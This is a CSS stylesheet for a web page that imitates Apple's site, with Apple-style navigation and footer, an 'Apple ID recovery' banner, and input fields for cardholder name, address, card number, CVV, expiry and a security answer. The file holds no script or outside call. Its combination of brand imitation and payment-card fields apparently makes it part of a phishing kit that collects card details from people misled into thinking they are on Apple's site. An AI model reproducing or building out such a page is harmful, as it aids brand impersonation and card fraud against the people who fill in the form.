body {
    padding: 0;
    margin: 0;
    font-family: 'Roboto', sans-serif; 
} 
.head-photo { 
    width: 100%; 
    height: 953px; 
    background-color: #fff;
    text-align: center;
} 
ul { 
    display: block; 
    list-style-type: disc; 
    margin-block-start: 1em; 
    margin-block-end: 1em; 
    margin-inline-start: 0px; 
    margin-inline-end: 0px; 
    padding-inline-start: 40px; 
} 
.nav { 
    position: absolute; 
    display: block; 
    top: 0; 
    right: 0; 
    left: 0; 
    width: 100%; 
    height: 44px; 
    min-width: 320px;  
    z-index: 9; 
    background-color: rgba(0, 0, 0, .9); 
    backdrop-filter: saturate(1.8) blur(20px); 
    opacity: .9;  
    text-align: center;
} 
.naver {
    text-align: center;
    display: block;
    z-index: 99;
}
.navul { 
    position: relative; 
    display: inline-flex; 
    left: 0; 
    top: 0; 
    right: 0;
    width: 100%; 
    height: 44px; 
    max-width: 1024px;
    padding: 0 10px;
    margin: 0;
    line-height: 25px; 
    list-style: none; 
    transition: visibility 0s linear 1s; 
    box-sizing: border-box;
    justify-content: space-between;
    z-index: 999;
} 
.navul2 { 
    display: none; 
    position: absolute; 
    top: 0; 
    left: 0; 
    width: 100%; 
    height: 48px; 
    min-width: 320px; 
    padding: 0; 
    margin: 0; 
    line-height: 25px; 
    list-style: none; 
    z-index: 999;  
    transition: visibility 0s linear 1s; 
    overflow: hidden; 
} 
.navul li {
    display: inline-block;
    position: relative;
    height: 44px;
    vertical-align: top;
    text-align: center;
}
.navul a {
    height: 44px;
}

.apple a {
    display: inline-block;
    background-image: url(images/image-large.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: 20px 44px;
    width: 20px;
    padding: 0 10px;
}
.mac a {
    display: inline-block;
    background-image: url(images/image-large2.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 2em;
    max-width: 47.6px;
    padding: 0 10px;
    background-origin: content-box;
}
.ipad a {
    display: inline-block;
    background-image: url(images/image-large3.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 1.92857em;
    max-width: 45.9px;
    padding: 0 10px;
    background-origin: content-box;
}
.iphone a {
    display: inline-block;
    background-image: url(images/image-large4.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 3.14286em;
    max-width: 74.8px;
    padding: 0 10px;
    background-origin: content-box;
}
.watch a {
    display: inline-block;
    background-image: url(images/image-large5.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 2.85714em;
    max-width: 68px;
    padding: 0 10px;
    background-origin: content-box;
}
.tv a {
    display: inline-block;
    background-image: url(images/image-large6.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 1.28571em;
    max-width: 30.6px;
    padding: 0 10px;
    background-origin: content-box;
}
.music a {
    display: inline-block;
    background-image: url(images/image-large7.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 2.64286em;
    padding: 0 10px;
    max-width: 62.9px;
    background-origin: content-box;
}
.support a {
    display: inline-block;
    background-image: url(images/image-large8.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    width: 3.71429em;
    max-width: 88.4px;
    padding: 0 10px;
    background-origin: content-box;
}
.search a {
    display: inline-block;
    background-image: url(images/search-icon.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: 16px 44px;
    width: 16px;
    padding: 0 10px;
}
.bag a {
    display: inline-block;
    background-image: url(images/image-large9.svg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: 14px 45px;
    width: 14px;
    padding: 0 10px;
}
.nav a:hover {
    opacity: .6;
}


.footerer {
    background-color: #f2f2f2;
    min-width: 320px;
    overflow: hidden;
    position: relative;
    z-index: 1;
    box-sizing: border-box;
}
.footer {
    text-align: left;
    line-height: 15px;
    color: #888;
    margin: 0 auto;
    max-width: 980px;
    padding: 17px 22px 21px 22px;
    box-sizing: border-box;
}
.msg {
    text-align: left;
    line-height: 15px;
    color: #888;
    margin: 0 auto;
    max-width: 980px;
    padding: 7px 22px 5px 22px;
    box-sizing: border-box;
}
.msg p {
    font-size: 11px;
    color: #888;
    margin: 0; 
    padding-bottom: 5px;
    border-bottom: 1px solid #d6d6d6
 }
 .msg a {
     color: #0070c9;
     cursor: pointer;
 }
 .msg a:hover {
    text-decoration: underline;
}
.line {
    font-size: 11px;
    text-align: inherit;
    max-height: 9999px;
    padding-bottom: 3px;
    color: #888;
}
.line a {
    font-size: 11px;
    text-decoration: none;
    color: #0070c9;
    cursor: pointer;
}
.countryer {
    position: relative;
    padding-bottom: 10px;
    padding-top: 3px;
    float: right;
    position: relative;
    top: -3px;
    z-index: 2;
    white-space: nowrap;

}
.country { 
    font-size: 11px;
    display: inline;
    text-decoration: none;
    color: #555;
    white-space: nowrap;
    cursor: pointer;
}
.country img {
    height: 16px;
    width: 16px;
    display: inline-block;
    width: 16px;
    height: 16px;
    vertical-align: middle;
    padding-right: 5px;
    cursor: pointer;
    margin-top: -1px;
}
.line2er {
    position: relative;
    top: -3px;
    z-index: 1;
}
.line2 {
    font-size: 11px;
    margin-right: 30px;
    float: left;
    margin-top: 5px;
    max-height: 9999px;
    color: #888;
}
.line3 {
    position: relative;
    top: -5px;
    z-index: 1;
    margin-right: 30px;
    float: left;
    margin-top: 5px;
    cursor: pointer;
}
.line3 a {
    font-size: 11px;
    border-right: 1px solid #d6d6d6;
    margin-right: 7px;
    padding-right: 10px;
    display: inline-block;
    margin-top: 5px;
    white-space: nowrap;
    color: #555;
    text-decoration: none;
}
.line3 a:hover {
    text-decoration: underline;
}
.country:hover {
    text-decoration: underline;
}
.line a:hover {
    text-decoration: underline;
}
.p2img {
    position: relative;
    top: 0px;
    height: 224px;
    width: 100%;
    background-image: url(images/apple_id_recovery_2880x340.jpg);
    background-repeat: no-repeat;
    background-size: cover;
    background-position: center;
    text-align: center;
}
.accer {
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
    position: relative;
    top: 50px;
    width: 100%;
    text-align: left;
    max-width: 980px;
    padding: 17px 22px 21px 22px;
    box-sizing: border-box;
    color: #fff;
    display: inline-block;
    box-sizing: border-box;

}
.out {
    float: right;
    display: inline;
    position: relative;
    background-color: rgba(9, 9, 9, .4);
    opacity: .7;
    padding: 5px;
    font-size: 14px;
}
.out:hover {
    opacity: 1;
    cursor: pointer;
}
.accer h2 {
    font-size: 36px;
    font-weight: 100;
    margin-block-start: 0.6em;
    margin-block-end: 0.3em;
}
.accer h3 {
    font-weight: 100;
    font-size: 22px;
    display: inline;
}
.accer h4 {
    font-weight: 400;
    font-size: 22px;
    display: inline;
}
.content {
    max-width: 980px;
    padding: 17px 22px 21px 22px;
    width: 100%;
    height: auto;
    text-align: left;
    display: inline-block;
    box-sizing: border-box;
}
.datos3 {
    width: auto;
    margin-left: 50px;
    margin-top: 15px;
}
.perso {
    font-weight: 200;
    font-size: 24px;
    margin-left: 50px;
    margin-bottom: 0px;
    color: #333
}
#cardhname, #cardhad, #exp, #secyes {
    margin-left: 0px !important;
    border-style: solid;
    border-color: rgb(200, 200, 200);
    display: block;
    min-width: 270px;
    box-shadow: none;
    width: 100%;
    max-width: 370px;
    position: relative;
    box-sizing: border-box;
    margin: auto;
    outline: none;
    background-attachment: scroll;
    background-clip: padding-box;
    border-radius: 4px;
    border-width: 1px;
    cursor: text;
    font-size: 17px;
    font-stretch: 100%;
    height: 30px;
    letter-spacing: -0.357px;
    padding-left: 12px;
    padding-right: 12px;
    color: rgb(73, 73, 73);
    margin-bottom: 12px;
    transition: 0.2s ease-in;
}
::placeholder {
    color: rgb(100, 100, 100);
    font-size: 12px;
    font-weight: 100;
    letter-spacing: .02em;
}
#cardhname:focus, #cardhad:focus, #exp:focus, #secyes:focus {
    height: 45px;
    border-color: #0070c9
}


option {
    font-size: 14px;
}
.next {
    width: 130px;
    height: 30px;
    box-shadow: none;
    cursor: pointer;
    background-color: #2196F3;
    border-width: 0;
    color: #fff;
    border-radius: 2px;
    margin-top: 10px;
}
.next:hover {
    background-color: #0070c9
}
input[type="number"]::-webkit-inner-spin-button { display: none; }
input[type="date"]::-webkit-datetime-edit-fields-wrapper { text-transform: uppercase; font-size: 12px; color: rgb(180, 180, 180); font-weight: 100 }
input[type="date"]::-webkit-calendar-picker-indicator { display: none; }
input[type="date"]::-webkit-inner-spin-button { display: none; }
input[type="date"]::-webkit-clear-button { display: none; }

.cardinfo, .secer {
    margin-left: 0px !important;
    display: block;
    min-width: 270px;
    width: 100%;
    max-width: 370px;
    position: relative;
    box-sizing: border-box;
    margin: auto;
    text-align: left
}
.secer {
    height: 20px;
}
#cardnum, #cvv {
    margin-left: 0px !important;
    border-style: solid;
    border-color: rgb(200, 200, 200);
    display: inline;
    box-shadow: none;
    position: relative;
    box-sizing: border-box;
    outline: none;
    background-attachment: scroll;
    background-clip: padding-box;
    border-width: 1px;
    cursor: text;
    font-size: 17px;
    font-stretch: 100%;
    height: 30px;
    letter-spacing: -0.357px;
    padding-left: 12px;
    color: rgb(73, 73, 73);
    transition: 0.2s ease-in;
}
#cardnum {
    width: 100%;
    border-top-left-radius: 4px;
    border-bottom-left-radius: 4px;
    border-top-right-radius: 1px;
    border-bottom-right-radius: 1px;
    padding-right: 45px;
    margin-bottom: 12px;
}
#cvv {
    float: right;
    max-width: 74px;
    width: 20%;
    border-top-left-radius: 1px;
    border-bottom-left-radius: 1px;
    border-top-right-radius: 4px;
    border-bottom-right-radius: 4px;
    padding-right: 8px;
    margin-bottom: 12px;
}
.type {
    position: relative;
    display: none;
    float: right;
    height: 30px;
    width: 40px;
    top: -42px;
    background-size: contain;
    background-repeat: no-repeat;
    background-position-x: right;
    transition: 0.2s ease-in;
}
.inv {
    display: none;
    font-size: 12px;
    color: rgb(200, 0, 0);
    font-weight: 100;
}
#cardnum:focus, #cvv:focus {
    border-color: #0070c9
}
.typer {
    display: inline-block;
    width: 77%;
    height: 30px;
    max-width: 284.9px;
}
.secno {
    display: inline;
    position: relative;
    padding-left: 35px;
    margin-bottom: 12px;
    cursor: pointer;
    font-size: 22px;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    float: left;
}
.secno input {
    position: absolute;
    opacity: 0;
    cursor: pointer;
    height: 0;
    width: 0;
  }
.checkmark {
    position: absolute;
    top: 0;
    left: 0;
    height: 15px;
    width: 15px;
    border-radius: 2px;
    background-color: #eee;
}
.secno:hover input ~ .checkmark {
    background-color: #ccc;
}
.secno input:checked ~ .checkmark {
    background-color: #2196F3;
  }
.checkmark:after {
    content: "";
    position: absolute;
    display: none;
}
.secno input:checked ~ .checkmark:after {
    display: inline;
}
.secno .checkmark:after {
    left: 5px;
    top: 3px;
    width: 2px;
    height: 5px;
    border: solid white;
    border-width: 0 3px 3px 0;
    -webkit-transform: rotate(45deg);
    -ms-transform: rotate(45deg);
    transform: rotate(45deg);
}
.secer p {
    margin: 0;
    display: inline;
    font-size: 14px;
    color: #555;
    position: absolute;
    left: 25px;
    padding-left: 2px;
}
.icon2 {
    width: 85px;
    height: 50px;
    background-image: url(images/pnj.png);
    background-size: cover;
    background-repeat: no-repeat;
    margin-left: 50px;
    margin-top: 40px;
}
.infoer {
    text-align: left;
    max-width: 370px;
    width: 100%
}
.infoer a {
    color: #0070c9;
    font-size: 12px;
    font-weight: 100;
    float: right;
    cursor: pointer;
}
.infoer a:hover {
    text-decoration: underline;
}
.infoer p {
    font-size: 12px;
    color:rgb(80, 80, 80);
    font-weight: 100
}
.loading {
    text-align: center;
    display: none;
    margin-top: 150px;
}
.success {
    display: none;
    margin-top: 100px;
}
.btns {
    box-sizing: border-box
}





@media only screen and (max-width: 736px) { 
    .head-photo { 
        background-color: #fff; 
        height: 900px; 
        min-width: 320px;
    } 
    
    .nav { 
        height: 48px; 
    } 
    .navul { 
        display: none; 
    } 
    .navul2 { 
        display: block; 
    } 
    .apple2 a { 
        position: relative; 
        display: inline-block; 
        width: 20px; 
        height: 48px; 
        padding: 0 10px; 
        background-image: url(images/image_small.svg) ; 
        background-size: 18px 48px; 
        background-repeat: no-repeat; 
        background-position: center center ; 
        z-index: 2; 
        transition: opacity 0.2s cubic-bezier(0.645, 0.045, 0.355, 1); 
    } 
    .bag2 a { 
        display: inline-block; 
        width: 14px; 
        height: 48px; 
        padding: 0 16px; 
        background-image: url(images/image_small\ \(1\).svg) ; 
        background-size: 17px 48px; 
        background-repeat: no-repeat; 
        background-position: center center ; 
        z-index: 4; 
        transition: opacity 0.2s cubic-bezier(0.645, 0.045, 0.355, 1); 
    } 
    .apple2 { 
        display: block; 
        position: absolute; 
        top: 0; 
        left: 50%; 
        width: 48px; 
        height: 48px; 
        margin-left: -24px; 
        text-align: center; 
        z-index: 1; 

     } 
     .bag2 { 
        position: absolute; 
        display: block; 
        right: 0; 
        top: 0; 
        width: auto; 
        height: 48px; 
        text-align: center; 
        z-index: 2;
     } 
     .menu { 
        display: block; 
        position: absolute; 
        height: 48px; 
        width: 48px; 
        top: 0; 
        left: 0; 
        z-index: 2; 
             
     }
     .footer {
         padding-left: 16px;
         padding-right: 16px;
     }
     .countryer {
         float: none;
         padding-bottom: 5px;
     }
     .line2 {
         margin-top: 1px;
     }
     .accer {
         text-align: center;
         padding-left: 5px;
         padding-right: 5px;
     }
     .accer h2 {
         font-size: 27px;
     }
     .accer h3 {
         font-size: 15px;
     }
     .accer h4 {
         font-size: 15px;
         font-weight: 200;
     }
     .out {
         float: none;
         display: block;
         margin-top: 15px;
     }
     .content {
         text-align: center;
         padding-left: 25px;
         padding-right: 25px;
     }
     .datos3 {
         margin-left: auto;
         margin-top: 5px;

     }
     .inv {
         float: left
     }
     .perso {
         font-size: 19px;
         margin-left: auto;
         position: relative;
         margin-bottom: 19px; 
         text-align: left;
     }
     .next {
         width: 180px;
     }
     .icon2 {
         margin-left: 0px;
     }
     .success h1 {
        font-size: 21px;
    }
    .success h3 {
        font-size: 12px;
    }
    .success a {
        font-size: 18px;
    }
    @media only screen and (max-width: 370px) {
        .pass, .subs {
            font-size: 10px !important;
            padding: 8px !important;
        }
        .btns {
            padding-left: 0px !important;
            padding-right: 0px !important;
        }
    }
}